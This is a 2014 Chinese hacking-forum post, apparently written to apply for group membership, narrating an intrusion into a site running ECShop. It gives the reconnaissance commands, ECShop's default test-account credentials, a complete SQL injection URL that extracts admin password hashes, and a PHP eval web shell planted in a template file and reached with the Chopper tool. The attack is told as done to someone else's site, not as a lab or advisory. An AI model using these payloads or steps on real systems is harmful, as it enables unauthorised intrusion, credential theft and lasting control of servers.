申请转正
###########################################Title :帮朋友 搞站(08sec申请转正帖)
#Time : 2014年5月26日
#Team:
#Author : 蜗牛
#首发 : 08安全小组
#图片 在本地, 传不上去纠结
#######################################
目标站点:
www.xx.cn
KaLi
dnsrecon -d xx.cn -g --google --lifetime 30
结果:
www.xx.cn=>4.4.4.4
sp.xx.cn=> 3.3.3.11
down.xx.cn => 4.1.1.1
mail.xx.cn => 3.3.37.3
service.xx.cn =>3.3.4.2
看IP格式 ,sp.xx.cn mail.xx.cnservice.xx.cn 都是 3.3.3.* 像一个网段的。
主站 www.xx.cn 的IP 和 down.xx.cn 的IP没有规律。
顺手访问了一下 :down.xx.cn
第一眼看,感觉有戏,可以列目录。上面好多rar的文件,打包下载下来发现 都是游戏资源,再结合二级目录的名字 这个很可能是游戏资源服务器,搞下来意义不大,一般游戏资源服务器都做了cdn。结果证明了猜测是正确的。
直接把 down.xx.cn 域名都放 http://ping.aizhan.com/ 上面,想通过各地ping域名看一下,看得到的结果是否同一个IP 来判断单个的域名是否用了CDN,结果正是我的猜测。
。。。。。。。。宁愿我猜错了。。。
把主站和二级域名都放上去。各地ping一下 ,最终得到结果。
www.xx.com
down.xx.com
2个域名使用了 CDN
mail.xx.cn
service.xx.cn
sp.xx.cn
这3个没使用CDN
分别访问 这3个域名:
mail.xx.cn 无法访问,其实对于这个是没有患有任何希望的,mail差不多就告诉我结果。
service.xx.cn访问显示一片空白。
访问sp.xx.cn 出来了
一看这个界面,我笑了。 默认账号密码登录失败。。
FUCK
看来管理员安全意识还是有的,即使是这样的开发测试版本都知道换后台的帐号密码。。 不过 既然 安装了ecshop的时候默认安装了测试数据,那么 哈哈!
默认安装ecshop测试数据的话,在后台会有2个帐号:
shhaigonghuo1 密码shhaigonghuo1
帐号bjgonghuo1密码shhaigonghuo1
果断尝试这其中一个,成功登录进去了。。。。
可是后台权限太小了,不过我记得前段时间出过一个 很鸡肋的ecshop后台注入漏洞的。
直接:http://sp.xx.cn/admin/affiliate_ck.php?act=list&auid=121%20or%201=1%20union%20select%201%20and%20%28select%201%20from%28select%20count%28*%29,concat%28%28Select%20concat%280x5b,user_name,0x3a,password,0x5d%29%20FROM%20ecs_admin_user%20limit%200,1%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29%20%23
果断出来密码了
md5居然是收费的,不过能出来密码算是不错
帮买了直接 。直接admin 登录上去。
报错 不出路径,服务器上屏蔽了报错信息了,看来插入数据库走不通了,看菜单栏选项里面的库项目管理存在,顿时了起来了。。
模板管理==>库项目管理==>选择myship.lbi 配送方式。
在文件内容最后面加入一句话代码:<?php eval($_POST);?>
菜刀链接http://www.xx.cn/myship.php 成功。
只能说运气了。
上个图吧 发个邮箱word文档直接发你邮箱吧 。这个好像不能穿本地的图片上来 管理03 发表于 2014-5-26 21:30
上个图吧
图以上 。。。
页:
[1]